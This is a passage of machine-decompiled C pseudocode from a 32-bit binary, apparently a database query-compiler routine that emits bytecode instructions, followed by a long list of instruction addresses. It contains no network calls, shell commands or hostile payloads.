																							_t1208 = _t1217 + 0x24;
																						}
																						goto L214;
																					} else {
																						_t1153 = 0;
																						__eflags = 0;
																						_v12 = 0;
																						do {
																							_t1193 = _v24 + 1 + _t1099;
																							_v28 = _t1193;
																							__eflags = _t1099 -  *((intOrPtr*)(_t898 + 8));
																							if(_t1099 !=  *((intOrPtr*)(_t898 + 8))) {
																								__eflags = _a20;
																								if(_a20 != 0) {
																									_t1101 = _a20;
																									_t913 = 0;
																									_t1154 =  *(_t1101 + 4);
																									__eflags = _t1154;
																									if(_t1154 <= 0) {
																										L205:
																										__eflags = _v56;
																										if(_v56 == 0) {
																											L187:
																											_push(_t1193);
																											_push( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + _v12 + 4)));
																											L188:
																											_push(_t1074);
																											_t916 = E00FC1817();
																											_t1217 = _t1217 + 0xc;
																											__eflags = _t916 - _t1193;
																											if(_t916 == _t1193) {
																												L192:
																												_t1153 = _v12;
																												goto L193;
																											}
																											_t1104 =  *(_t1074 + 0xc);
																											__eflags = _t1104;
																											if(_t1104 == 0) {
																												goto L192;
																											}
																											_push(_t1193);
																											_push(_t916);
																											_push(9);
																											_push(_t1104);
																											L191:
																											E00FD6567();
																											_t1217 = _t1217 + 0x10;
																											goto L192;
																										}
																										__eflags = _t1101;
																										if(_t1101 == 0) {
																											L208:
																											__eflags = _v60;
																											_push(_t1193);
																											if(_v60 == 0) {
																												__eflags = _a16;
																												if(_a16 == 0) {
																													_push( *((intOrPtr*)( *((intOrPtr*)(_a12 + 0xc)) + (_t913 + _t913 * 4) * 4)));
																													goto L188;
																												}
																												_push(_t913 + _v96);
																												_push(9);
																												_push(_t1180);
																												goto L191;
																											}
																											_push(_t913);
																											_push(_v32);
																											_push(3);
																											_push(_t1180);
																											E00FD65D7();
																											_t1217 = _t1217 + 0x14;
																											goto L192;
																										}
																										__eflags = _t913 -  *(_t1101 + 4);
																										if(_t913 >=  *(_t1101 + 4)) {
																											goto L187;
																										}
																										goto L208;
																									}
																									_t1194 = _v64;
																									_t1107 =  *_t1101 + 4;
																									__eflags = _t1107;
																									while(1) {
																										__eflags =  *_t1107 - _t1194;
																										if( *_t1107 == _t1194) {
																											break;
																										}
																										_t913 = _t913 + 1;
																										_t1107 = _t1107 + 8;
																										__eflags = _t913 - _t1154;
																										if(_t913 < _t1154) {
																											continue;
																										}
																										break;
																									}
																									_t1193 = _v28;
																									L203:
																									__eflags = _t913;
																									if(_t913 < 0) {
																										goto L187;
																									}
																									_t1101 = _a20;
																									goto L205;
																								}
																								_t922 =  *((intOrPtr*)(_t898 + 0x10));
																								__eflags =  *((char*)(_t922 + _t1153 + 0x17));
																								if( *((char*)(_t922 + _t1153 + 0x17)) == 0) {
																									_t913 = _t1099 - _v20;
																									goto L203;
																								}
																								_t566 =  &_v20;
																								 *_t566 = _v20 + 1;
																								__eflags =  *_t566;
																								goto L187;
																							}
																							_t924 =  *(_t1180 + 0xc);
																							_v28 = _t924;
																							__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t924;
																							if( *((intOrPtr*)(_t1180 + 0x10)) > _t924) {
																								L183:
																								 *(_t1180 + 0xc) =  *(_t1180 + 0xc) + 1;
																								_t1108 = _t924 + _t924 * 4;
																								_t925 =  *((intOrPtr*)(_t1180 + 0x14));
																								 *((short*)(_t925 + _t1108 * 4)) = 0x77;
																								 *((char*)(_t925 + 3 + _t1108 * 4)) = 0;
																								 *(_t925 + 4 + _t1108 * 4) = 0;
																								 *((intOrPtr*)(_t925 + 8 + _t1108 * 4)) = _t1193;
																								 *(_t925 + 0xc + _t1108 * 4) = 0;
																								 *(_t925 + 0x10 + _t1108 * 4) = 0;
																								 *((char*)(_t1180 + 0x6e)) = 0;
																								goto L193;
																							}
																							_t926 = E00FA96F7(_t1180);
																							_t1153 = _v12;
																							_t1217 = _t1217 + 4;
																							__eflags = _t926;
																							if(_t926 != 0) {
																								goto L193;
																							}
																							_t924 = _v28;
																							goto L183;
																							L193:
																							_t898 = _v8;
																							_t1099 = _v64 + 1;
																							_t1153 = _t1153 + 0x18;
																							_v64 = _t1099;
																							_v12 = _t1153;
																							__eflags = _t1099 -  *(_t898 + 0xc);
																						} while (_t1099 <  *(_t898 + 0xc));
																						_t1182 = _v52;
																						goto L195;
																					}
																				}
																				L166:
																				__eflags =  *_t934 - 0x77;
																				if( *_t934 != 0x77) {
																					goto L158;
																				}
																				_t1115 = _v8;
																				__eflags =  *(_t1115 + 0x22) & 0x00000010;
																				if(( *(_t1115 + 0x22) & 0x00000010) != 0) {
																					goto L158;
																				}
																				 *(_t934 + 4) = _v40;
																				_t1098 = _v24;
																				 *_t934 = 0x1a;
																				 *((intOrPtr*)(_t934 + 8)) = _v24;
																				 *(_t934 + 0xc) = _v104;
																				L174:
																				_v116 = 1;
																				goto L175;
																			}
																			_t934 = 0x4873ec;
																			goto L166;
																		}
																		_push(_v96 + _t1096);
																		_push(9);
																		_push(_t1180);
																		E00FD6567();
																		_t1217 = _t1208 + 0x10;
																		goto L158;
																	}
																	_push(_t1096);
																	_push(_v32);
																	_push(3);
																	_push(_t1180);
																	E00FD65D7();
																	_t1217 = _t1208 + 0x14;
																	goto L158;
																}
															} else {
																_t1117 =  *(_t1074 + 0x15);
																__eflags = _t1117;
																if(_t1117 != 0) {
																	_t1118 = _t1117 - 1;
																	__eflags = _t1118;
																	 *(_t1074 + 0x15) = _t1118;
																	_t950 =  *(_t1074 + 0x18 + (_t1118 & 0x000000ff) * 4);
																} else {
																	 *(_t1074 + 0x48) =  *(_t1074 + 0x48) + 1;
																	_t950 =  *(_t1074 + 0x48);
																}
																_t1119 = _v76;
																_v12 = _t950;
																_push(_t950);
																__eflags = _t1119;
																if(_t1119 >= 0) {
																	__eflags = _v60;
																	if(_v60 == 0) {
																		_push( *((intOrPtr*)( *((intOrPtr*)(_a12 + 0xc)) + (_t1119 + _t1119 * 4) * 4)));
																		_push(_t1074);
																		E00FC1357();
																		_t1219 = _t1208 + 0xc;
																	} else {
																		_push(_t1119);
																		_push(_v32);
																		_push(3);
																		_push(_t1180);
																		E00FD65D7();
																		_t1219 = _t1208 + 0x14;
																	}
																	_v36 = E00FD64F7(_t1180, 0x48, _v12);
																	E00FD6567(_t1180, 0x30, 0xffffffff, _v12);
																	_t1158 =  *(_t1180 + 0xc);
																	_t956 = _v36;
																	_t1220 = _t1219 + 0x1c;
																	__eflags = _t1158 - _t956;
																	if(_t1158 > _t956) {
																		 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t956 + _t956 * 4) * 4) = _t1158;
																	}
																	E00FD64F7(_t1180, 0x26, _v12);
																	_t1221 = _t1220 + 0xc;
																} else {
																	_push(0xffffffff);
																	_push(0x30);
																	_push(_t1180);
																	E00FD6567();
																	_t1221 = _t1208 + 0x10;
																}
																_t959 = E00FC5D87(_t1074,  *((intOrPtr*)(_v8 + 0xc)));
																_t1121 = _v8;
																_t1159 = _t959;
																_t960 = 0;
																_t1222 = _t1221 + 8;
																_v36 = _t1159;
																_v64 = 0;
																__eflags =  *(_t1121 + 0xc);
																if( *(_t1121 + 0xc) <= 0) {
																	L121:
																	_t961 =  *(_t1074 + 0x15);
																	__eflags = _t961;
																	if(_t961 != 0) {
																		_t962 = _t961 - 1;
																		__eflags = _t962;
																		 *(_t1074 + 0x15) = _t962;
																		_t964 =  *(_t1074 + 0x18 + (_t962 & 0x000000ff) * 4);
																	} else {
																		 *(_t1074 + 0x48) =  *(_t1074 + 0x48) + 1;
																		_t964 =  *(_t1074 + 0x48);
																	}
																	_v16 = _t964;
																	_v92 =  *(_t1121 + 0xc);
																	_t966 =  *(_t1180 + 0xc);
																	_v28 = _t966;
																	__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t966;
																	if( *((intOrPtr*)(_t1180 + 0x10)) > _t966) {
																		L127:
																		_t363 = _t1180 + 0xc;
																		 *_t363 =  *(_t1180 + 0xc) + 1;
																		__eflags =  *_t363;
																		_t1122 = _t966 + _t966 * 4;
																		_t967 =  *((intOrPtr*)(_t1180 + 0x14));
																		 *((intOrPtr*)(_t967 + 4 + _t1122 * 4)) = _v36;
																		 *((intOrPtr*)(_t967 + 8 + _t1122 * 4)) = _v92;
																		 *((short*)(_t967 + _t1122 * 4)) = 0x4f;
																		 *((char*)(_t967 + 3 + _t1122 * 4)) = 0;
																		 *((intOrPtr*)(_t967 + 0xc + _t1122 * 4)) = _v16;
																		 *(_t967 + 0x10 + _t1122 * 4) = 0;
																		 *((char*)(_t1180 + 0x6e)) = 0;
																		goto L128;
																	} else {
																		_t980 = E00FA96F7(_t1180);
																		_t1222 = _t1222 + 4;
																		__eflags = _t980;
																		if(_t980 != 0) {
																			L128:
																			__eflags = _v100;
																			if(_v100 == 0) {
																				E00FD2297(_t1180, _v8);
																				_t1222 = _t1222 + 8;
																			}
																			_t968 =  *(_t1180 + 0xc);
																			_v28 = _t968;
																			__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t968;
																			if( *((intOrPtr*)(_t1180 + 0x10)) > _t968) {
																				L133:
																				 *(_t1180 + 0xc) =  *(_t1180 + 0xc) + 1;
																				_t1123 = _t968 + _t968 * 4;
																				_t969 =  *((intOrPtr*)(_t1180 + 0x14));
																				 *((intOrPtr*)(_t969 + 4 + _t1123 * 4)) = _v80;
																				_t1164 = _v16;
																				 *(_t969 + 0xc + _t1123 * 4) = _v12;
																				_t1182 = _v52;
																				 *((short*)(_t969 + _t1123 * 4)) = 0x6e;
																				 *((char*)(_t969 + 3 + _t1123 * 4)) = 0;
																				 *(_t969 + 8 + _t1123 * 4) = _t1164;
																				 *(_t969 + 0x10 + _t1123 * 4) = 0;
																				 *((char*)(_t1180 + 0x6e)) = 0;
																				goto L135;
																			} else {
																				_t978 = E00FA96F7(_t1180);
																				_t1222 = _t1222 + 4;
																				__eflags = _t978;
																				if(_t978 != 0) {
																					_t1164 = _v16;
																					L135:
																					__eflags = _t1164;
																					if(_t1164 == 0) {
																						L142:
																						__eflags = _v12;
																						if(_v12 == 0) {
																							L149:
																							_t1124 = _v8;
																							_t970 =  *((intOrPtr*)(_v8 + 0xc));
																							__eflags = _t970 -  *((intOrPtr*)(_t1074 + 0x38));
																							if(_t970 >  *((intOrPtr*)(_t1074 + 0x38))) {
																								 *((intOrPtr*)(_t1074 + 0x38)) = _t970;
																								 *((intOrPtr*)(_t1074 + 0x3c)) = _v36;
																							}
																							_t971 = E00FBCB07(_t1074, _v88, 0x6b, 0, 1, _t1124, _v80, 0xffffffff, _a24, _v48, 0, 0);
																							_t1208 = _t1222 + 0x30;
																							__eflags = _t971;
																							if(_t971 != 0) {
																								goto L257;
																							} else {
																								goto L152;
																							}
																						}
																						_t1165 =  *(_t1074 + 0x15);
																						__eflags = _t1165 - 8;
																						if(_t1165 >= 8) {
																							goto L149;
																						}
																						_t1125 = 0;
																						__eflags = 0;
																						_t436 = _t1074 + 0x60; // 0x60
																						_t973 = _t436;
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t973 + 0x10)) - _v12;
																							_t1182 = _v52;
																							if( *((intOrPtr*)(_t973 + 0x10)) == _v12) {
																								break;
																							}
																							_t1125 = _t1125 + 1;
																							_t973 = _t973 + 0x18;
																							__eflags = _t1125 - 0xa;
																							if(_t1125 < 0xa) {
																								continue;
																							}
																							 *(_t1074 + 0x18 + (_t1165 & 0x000000ff) * 4) = _v12;
																							 *(_t1074 + 0x15) =  *(_t1074 + 0x15) + 1;
																							goto L149;
																						}
																						 *((char*)(_t973 + 9)) = 1;
																						goto L149;
																					}
																					_t975 =  *(_t1074 + 0x15);
																					_v65 = _t975;
																					__eflags = _t975 - 8;
																					if(_t975 >= 8) {
																						goto L142;
																					}
																					_t1127 = 0;
																					_t425 = _t1074 + 0x60; // 0x60
																					_t976 = _t425;
																					while(1) {
																						__eflags =  *((intOrPtr*)(_t976 + 0x10)) - _t1164;
																						if( *((intOrPtr*)(_t976 + 0x10)) == _t1164) {
																							break;
																						}
																						_t1127 = _t1127 + 1;
																						_t976 = _t976 + 0x18;
																						__eflags = _t1127 - 0xa;
																						if(_t1127 < 0xa) {
																							continue;
																						}
																						 *(_t1074 + 0x18 + (_v65 & 0x000000ff) * 4) = _t1164;
																						 *(_t1074 + 0x15) =  *(_t1074 + 0x15) + 1;
																						goto L142;
																					}
																					 *((char*)(_t976 + 9)) = 1;
																					goto L142;
																				}
																				_t968 = _v28;
																				goto L133;
																			}
																		}
																		_t966 = _v28;
																		goto L127;
																	}
																} else {
																	_v16 = _t1159;
																	_v20 = 0;
																	do {
																		__eflags = _a20;
																		if(_a20 != 0) {
																			_t981 = _a20;
																			_t1197 = 0;
																			_t1128 =  *(_t981 + 4);
																			__eflags = _t1128;
																			if(_t1128 <= 0) {
																				L109:
																				__eflags = _t1197 - _t1128;
																				if(_t1197 < _t1128) {
																					L99:
																					__eflags = _v60;
																					if(_v60 == 0) {
																						_t1198 =  *((intOrPtr*)( *((intOrPtr*)(_a12 + 0xc)) + (_t1197 + _t1197 * 4) * 4));
																						_v28 = _t1198;
																						_v92 =  *(_t1074 + 0xc);
																						_t985 = E00FC1817(_t1074, _t1198, _t1159);
																						_t1166 = _v16;
																						_t1222 = _t1222 + 0xc;
																						__eflags = _t985 - _t1166;
																						if(_t985 != _t1166) {
																							_t1131 =  *(_t1074 + 0xc);
																							__eflags = _t1131;
																							if(_t1131 != 0) {
																								E00FD6567(_t1131, 9, _t985, _t1166);
																								_t1166 = _v16;
																								_t1222 = _t1222 + 0x10;
																							}
																						}
																						__eflags =  *_t1198 - 0x84;
																						if( *_t1198 != 0x84) {
																							_t332 = _t1074 + 0x48;
																							 *_t332 =  *(_t1074 + 0x48) + 1;
																							__eflags =  *_t332;
																							_t1199 =  *(_t1074 + 0x48);
																							E00FD6567(_v92, 0x14, _t1166, _t1199);
																							_t991 = _v28;
																							 *(_t991 + 0x18) = _t1199;
																							 *_t991 = 0x84;
																							L118:
																							_t1222 = _t1222 + 0x10;
																						}
																						goto L119;
																					}
																					_t987 =  *(_t1180 + 0xc);
																					_v92 = _t987;
																					__eflags =  *((intOrPtr*)(_t1180 + 0x10)) - _t987;
																					if( *((intOrPtr*)(_t1180 + 0x10)) > _t987) {
																						L103:
																						 *(_t1180 + 0xc) =  *(_t1180 + 0xc) + 1;
																						_t1130 = _t987 + _t987 * 4;
																						_t988 =  *((intOrPtr*)(_t1180 + 0x14));
																						 *(_t988 + 4 + _t1130 * 4) = _v32;
																						 *((short*)(_t988 + _t1130 * 4)) = 3;
																						 *((char*)(_t988 + 3 + _t1130 * 4)) = 0;
																						 *(_t988 + 8 + _t1130 * 4) = _t1197;
																						 *((intOrPtr*)(_t988 + 0xc + _t1130 * 4)) = _v16;
																						 *(_t988 + 0x10 + _t1130 * 4) = 0;
																						 *((char*)(_t1180 + 0x6e)) = 0;
																						goto L119;
																					}
																					_t989 = E00FA96F7(_t1180);
																					_t1222 = _t1222 + 4;
																					__eflags = _t989;
																					if(_t989 != 0) {
																						goto L119;
																					}
																					_t987 = _v92;
																					goto L103;
																				}
																				_t995 = E00FC1817(_t1074,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + _v20 + 4)), _t1159);
																				_t1169 = _v16;
																				_t1222 = _t1222 + 0xc;
																				__eflags = _t995 - _t1169;
																				if(_t995 == _t1169) {
																					goto L119;
																				}
																				_t1133 =  *(_t1074 + 0xc);
																				__eflags = _t1133;
																				if(_t1133 == 0) {
																					goto L119;
																				}
																				E00FD6567(_t1133, 9, _t995, _t1169);
																				goto L118;
																			}
																			_t1078 = _v64;
																			_t998 =  *_t981 + 4;
																			__eflags = _t998;
																			while(1) {
																				__eflags =  *_t998 - _t1078;
																				if( *_t998 == _t1078) {
																					break;
																				}
																				_t1197 = _t1197 + 1;
																				_t998 = _t998 + 8;
																				__eflags = _t1197 - _t1128;
																				if(_t1197 < _t1128) {
																					continue;
																				}
																				break;
																			}
																			_t1074 = _a4;
																			goto L109;
																		}
																		_t1197 = _t960;
																		goto L99;
																		L119:
																		_t1121 = _v8;
																		_v16 = _v16 + 1;
																		_v20 = _v20 + 0x18;
																		_t1159 = _v16;
																		_t960 = _v64 + 1;
																		_v64 = _t960;
																		__eflags = _t960 -  *(_t1121 + 0xc);
																	} while (_t960 <  *(_t1121 + 0xc));
																	_t1182 = _v52;
																	goto L121;
																}
															}
														} else {
															_v40 =  *(_t1074 + 0x44);
															_v36 = E00FC9E27(_t1074, _v8,  *(_t1074 + 0x44), 0xa);
															_t1010 = E00FBE727(_t1182, 4 + _t1008 * 4);
															_t1208 = _t1215 + 0x18;
															_v84 = _t1010;
															__eflags = _t1010;
															if(_t1010 == 0) {
																goto L257;
															}
															_t1170 = _v36;
															_t1136 = 0;
															__eflags = _t1170;
															if(_t1170 <= 0) {
																goto L76;
															}
															_t1200 = _t1010;
															do {
																 *(_t1074 + 0x48) =  *(_t1074 + 0x48) + 1;
																 *(_t1200 + _t1136 * 4) =  *(_t1074 + 0x48);
																_t1136 = _t1136 + 1;
																__eflags = _t1136 - _t1170;
															} while (_t1136 < _t1170);
															_t1182 = _v52;
															goto L76;
														}
													} else {
														goto L54;
													}
													do {
														L54:
														_t1201 = 0;
														__eflags = 0 -  *((intOrPtr*)(_t1146 + 0xc));
														if(0 >=  *((intOrPtr*)(_t1146 + 0xc))) {
															L61:
															_t1202 = _a20;
															_t1016 = E00FC8B57( *((intOrPtr*)( *_t1202 + _t1088 * 8)));
															_t1137 = _v16;
															_t1215 = _t1215 + 4;
															__eflags = _t1016;
															if(_t1016 == 0) {
																_t1203 = _a4;
																_push( *((intOrPtr*)( *_t1202 + _t1137 * 8)));
																_push(0);
																E00FC0607(_t1203, 0x477c30, _a8);
																_t1208 = _t1215 + 0x14;
																 *((intOrPtr*)(_t1203 + 0x40)) =  *((intOrPtr*)(_t1203 + 0x40)) + 1;
																goto L257;
															}
															_t1146 = _v8;
															_v76 = _t1137;
															goto L64;
														}
														_t1079 =  *((intOrPtr*)(_t1146 + 0x10));
														_t1021 =  *_a20 + _t1088 * 8;
														_v20 =  *_a20 + _t1088 * 8;
														while(1) {
															_t1022 = E00FD21B7( *_t1021,  *_t1079);
															_t1146 = _v8;
															_t1215 = _t1215 + 8;
															__eflags = _t1022;
															_t1021 = _v20;
															if(_t1022 == 0) {
																break;
															}
															_t1201 = _t1201 + 1;
															_t1079 = _t1079 + 0x18;
															__eflags = _t1201 -  *((intOrPtr*)(_t1146 + 0xc));
															if(_t1201 <  *((intOrPtr*)(_t1146 + 0xc))) {
																continue;
															}
															_t1137 = _v16;
															L60:
															__eflags = _t1201 -  *((intOrPtr*)(_t1146 + 0xc));
															if(_t1201 <  *((intOrPtr*)(_t1146 + 0xc))) {
																_t1202 = _a20;
																goto L64;
															}
															goto L61;
														}
														_t1137 = _v16;
														 *((intOrPtr*)(_t1021 + 4)) = _t1201;
														__eflags = _t1201 -  *(_t1146 + 8);
														_t1024 =  ==  ? _t1137 : _v76;
														_v76 =  ==  ? _t1137 : _v76;
														goto L60;
														L64:
														_t1088 = _t1137 + 1;
														_v16 = _t1088;
														__eflags = _t1088 -  *((intOrPtr*)(_t1202 + 4));
													} while (_t1088 <  *((intOrPtr*)(_t1202 + 4)));
													_t1074 = _a4;
													goto L66;
												} else {
													goto L52;
												}
												do {
													L52:
													_t1087 = _t1087 + 1;
													 *( *_t1188 + _t1087 * 8 - 4) = 0xffffffff;
													__eflags = _t1087 -  *(_t1188 + 4);
												} while (_t1087 <  *(_t1188 + 4));
												goto L53;
											}
											_push(_t858);
											E00FC0607(_t1074, 0x477c14, _t1086);
											_t1208 = _t1215 + 0x10;
											goto L257;
										}
										if(_t1086 == 0) {
											goto L66;
										}
										_t1028 =  *((intOrPtr*)(_t1146 + 0xc));
										if(_t1086 == _t1028) {
											__eflags = _t1086;
											if(_t1086 > 0) {
												_v76 =  *(_t1146 + 8);
											}
											goto L66;
										}
										_push(_t1086);
										_push(_t1028);
										_push(0);
										E00FC0607(_t1074, 0x477be0, _a8);
										_t1208 = _t1215 + 0x18;
										goto L257;
									}
									_t1171 =  *((intOrPtr*)(_t1146 + 0xc));
									if(_t1171 <= 0) {
										_t1146 = _v8;
										goto L42;
									} else {
										_t1140 =  *((intOrPtr*)(_v8 + 0x10)) + 0x17;
										_t1204 = 0;
										goto L39;
										L39:
										_t1253 =  *_t1140;
										_t1140 = _t1140 + 0x18;
										_t1204 = _t1204 + (0 | _t1253 != 0x00000000);
										_t1171 = _t1171 - 1;
										if(_t1171 != 0) {
											goto L39;
										} else {
											_t1146 = _v8;
											goto L43;
										}
									}
								} else {
									_t1205 = 0;
									__eflags = 0;
									while(1) {
										_t121 = _t1085 + 0xc; // 0x890003ee
										_t1035 = E00FCE797( &_v172,  *((intOrPtr*)( *_t121 + _t1205)));
										_t1208 = _t1215 + 8;
										__eflags = _t1035;
										if(_t1035 != 0) {
											goto L257;
										}
										_t1085 = _a12;
										_t1037 = _v20 + 1;
										_t1205 = _t1205 + 0x14;
										_v20 = _t1037;
										__eflags = _t1037 - _v56;
										if(_t1037 < _v56) {
											continue;
										}
										goto L36;
									}
									goto L257;
								}
							}
							 *(_t1074 + 0x48) =  *(_t1074 + 0x48) + 1;
							_v12 =  *(_t1074 + 0x48);
							E00FD6567(_t1180, 0x30, 0,  *(_t1074 + 0x48));
							_t1041 =  *(_t1074 + 0x48) + 1;
							 *(_t1074 + 0x48) = _t1041;
							_v132 = _t1041;
							_v136 = 0xa;
							_v128 = 0;
							_v124 = 0;
							_v20 =  *(_t1180 + 0xc) + 2;
							E00FD6567(_t1180, 0x30,  *(_t1180 + 0xc) + 2 - 1, _t1041);
							_v36 = E00FD6567(_t1180, 0x60, 0, 0);
							_t1046 = E00FCFAC7(_t1074, _a16,  &_v136);
							_t1208 = _t1215 + 0x3c;
							if(_t1046 != 0 ||  *((intOrPtr*)(_t1074 + 0x40)) != _t1046 ||  *((intOrPtr*)(_t1182 + 0x1e)) != _t1046) {
								goto L257;
							} else {
								E00FD6567(_t1180, 0x30, 1, _v12);
								_t1206 = _v132;
								E00FD64F7(_t1180, 0x3c, _v132);
								E00FD6567(_t1180, 0x27, 2, 2);
								_t1172 =  *(_t1180 + 0xc);
								_t1050 = _v36;
								_t1223 = _t1208 + 0x2c;
								if(_t1172 > _t1050) {
									 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t1050 + _t1050 * 4) * 4) = _t1172;
								}
								_v96 = _v128;
								_v56 =  *( *_a16);
								if(_v88 != 0) {
									L26:
									_t1173 =  *(_t1074 + 0x44);
									_v60 = 1;
									_v32 = _t1173;
									 *(_t1074 + 0x44) = _t1173 + 1;
									_v48 = E00FC5DF7(_t1074);
									_v44 = E00FC5DF7(_t1074);
									E00FD6567(_t1180, 0x76, _t1173, _v56);
									_t1059 = E00FD64F7(_t1180, 0x3c, _t1206);
									_v36 = E00FD64F7(_t1180, 0xb, _v12);
									E00FD65D7(_t1180, 0x4f, _v96, _v56, _v48);
									E00FD6567(_t1180, 0x1a, _v32, _v44);
									E00FD65D7(_t1180, 0x6e, _v32, _v48, _v44);
									E00FD6567(_t1180, 0x60, 0, _t1059);
									_t1174 =  *(_t1180 + 0xc);
									_t1065 = _v36;
									_t1225 = _t1223 + 0x78;
									if(_t1174 > _t1065) {
										 *( *((intOrPtr*)(_t1180 + 0x14)) + 8 + (_t1065 + _t1065 * 4) * 4) = _t1174;
									}
									E00FCE477(_t1074, _v48);
									E00FCE477(_t1074, _v44);
									_t1215 = _t1225 + 0x10;
									goto L36;
								}
								_t1069 = E00FB2077(_t1180, _v20, _v16, _v8);
								_t1215 = _t1223 + 0x10;
								if(_t1069 == 0) {
									goto L36;
								}
								goto L26;
							}
						}
						_t1071 = E00FE4E17(_t1074, _v8, _a16, _a24, _v16);
						_t1208 = _t1214 + 0x14;
						if(_t1071 != 0) {
							goto L240;
						}
						goto L18;
					}
				}
			}
























































































































































































































                                                                                                                    0x00fc7633
                                                                                                                    0x00fc7637
                                                                                                                    0x00fc7639
                                                                                                                    0x00fc763c
                                                                                                                    0x00fc7640
                                                                                                                    0x00fc7647
                                                                                                                    0x00fc764a
                                                                                                                    0x00fc7651
                                                                                                                    0x00fc7658
                                                                                                                    0x00fc765b
                                                                                                                    0x00fc765e
                                                                                                                    0x00fc7661
                                                                                                                    0x00fc7664
                                                                                                                    0x00fc7667
                                                                                                                    0x00fc766a
                                                                                                                    0x00fc766d
                                                                                                                    0x00fc7670
                                                                                                                    0x00fc7673
                                                                                                                    0x00fc767b
                                                                                                                    0x00fc7683
                                                                                                                    0x00fc85fc
                                                                                                                    0x00fc85ff
                                                                                                                    0x00fc8603
                                                                                                                    0x00fc860c
                                                                                                                    0x00fc8611
                                                                                                                    0x00fc8614
                                                                                                                    0x00fc8619
                                                                                                                    0x00fc8622
                                                                                                                    0x00fc862b
                                                                                                                    0x00fc8630
                                                                                                                    0x00fc8633
                                                                                                                    0x00fc8638
                                                                                                                    0x00fc863c
                                                                                                                    0x00fc8646
                                                                                                                    0x00fc864d
                                                                                                                    0x00fc8651
                                                                                                                    0x00fc867a
                                                                                                                    0x00fc867f
                                                                                                                    0x00fc8663
                                                                                                                    0x00fc8669
                                                                                                                    0x00fc866b
                                                                                                                    0x00fc8671
                                                                                                                    0x00fc8671
                                                                                                                    0x00fc8651
                                                                                                                    0x00fc864d
                                                                                                                    0x00fc8686
                                                                                                                    0x00fc868b
                                                                                                                    0x00fc868e
                                                                                                                    0x00fc8693
                                                                                                                    0x00fc8697
                                                                                                                    0x00fc86a1
                                                                                                                    0x00fc86a8
                                                                                                                    0x00fc86ac
                                                                                                                    0x00fc86d5
                                                                                                                    0x00fc86da
                                                                                                                    0x00fc86be
                                                                                                                    0x00fc86c4
                                                                                                                    0x00fc86c6
                                                                                                                    0x00fc86cc
                                                                                                                    0x00fc86cc
                                                                                                                    0x00fc86ac
                                                                                                                    0x00fc86a8
                                                                                                                    0x00fc86e1
                                                                                                                    0x00fc86ea
                                                                                                                    0x00fc86ef
                                                                                                                    0x00fc86f2
                                                                                                                    0x00fc86f7
                                                                                                                    0x00fc86fb
                                                                                                                    0x00fc8705
                                                                                                                    0x00fc870c
                                                                                                                    0x00fc8710
                                                                                                                    0x00fc8739
                                                                                                                    0x00fc873e
                                                                                                                    0x00fc8722
                                                                                                                    0x00fc8728
                                                                                                                    0x00fc872a
                                                                                                                    0x00fc8730
                                                                                                                    0x00fc8730
                                                                                                                    0x00fc8710
                                                                                                                    0x00fc870c
                                                                                                                    0x00fc8741
                                                                                                                    0x00fc8746
                                                                                                                    0x00fc874a
                                                                                                                    0x00fc8754
                                                                                                                    0x00fc875b
                                                                                                                    0x00fc875f
                                                                                                                    0x00fc8788
                                                                                                                    0x00fc878d
                                                                                                                    0x00fc8771
                                                                                                                    0x00fc8777
                                                                                                                    0x00fc8779
                                                                                                                    0x00fc877f
                                                                                                                    0x00fc877f
                                                                                                                    0x00fc875f
                                                                                                                    0x00fc875b
                                                                                                                    0x00fc8792
                                                                                                                    0x00fc87bb
                                                                                                                    0x00fc87c0
                                                                                                                    0x00fc87a4
                                                                                                                    0x00fc87aa
                                                                                                                    0x00fc87ac
                                                                                                                    0x00fc87b2
                                                                                                                    0x00fc87b2
                                                                                                                    0x00fc8792
                                                                                                                    0x00fc87c7
                                                                                                                    0x00fc87cc
                                                                                                                    0x00fc87d4
                                                                                                                    0x00fc8814
                                                                                                                    0x00fc87ea
                                                                                                                    0x00fc87ea
                                                                                                                    0x00fc87f1
                                                                                                                    0x00fc87f3
                                                                                                                    0x00fc87fa
                                                                                                                    0x00fc8804
                                                                                                                    0x00fc8804
                                                                                                                    0x00fc7692
                                                                                                                    0x00fc7692
                                                                                                                    0x00fc7699
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc76a6
                                                                                                                    0x00fc76a8
                                                                                                                    0x00fc76ab
                                                                                                                    0x00fc76b0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc76ba
                                                                                                                    0x00fc76c1
                                                                                                                    0x00fc76c7
                                                                                                                    0x00fc76d4
                                                                                                                    0x00fc76d9
                                                                                                                    0x00fc76de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc76f6
                                                                                                                    0x00fc7703
                                                                                                                    0x00fc7706
                                                                                                                    0x00fc770b
                                                                                                                    0x00fc770e
                                                                                                                    0x00fc7710
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc7718
                                                                                                                    0x00fc771d
                                                                                                                    0x00fc7722
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fc772e
                                                                                                                    0x00fc7730
                                                                                                                    0x00fc7735
                                                                                                                    0x00000000
                                                                                                                    0x00fc773b
                                                                                                                    0x00fc773f
                                                                                                                    0x00fc7741
                                                                                                                    0x00fc7741
                                                                                                                    0x00fc7749
                                                                                                                    0x00fc7755
                                                                                                                    0x00fc7751
                                                                                                                    0x00fc7751
                                                                                                                    0x00fc7751
                                                                                                                    0x00fc775f
                                                                                                                    0x00fc7764
                                                                                                                    0x00fc776b
                                                                                                                    0x00fc776d
                                                                                                                    0x00fc7770
                                                                                                                    0x00fc7774
                                                                                                                    0x00fc7774
                                                                                                                    0x00fc777b
                                                                                                                    0x00fc779b
                                                                                                                    0x00fc77a2
                                                                                                                    0x00fc77a7
                                                                                                                    0x00fc77ae
                                                                                                                    0x00fc77b1
                                                                                                                    0x00fc7963
                                                                                                                    0x00fc7966
                                                                                                                    0x00fc7969
                                                                                                                    0x00fc7971
                                                                                                                    0x00fc7979
                                                                                                                    0x00fc7981
                                                                                                                    0x00fc7989
                                                                                                                    0x00fc7993
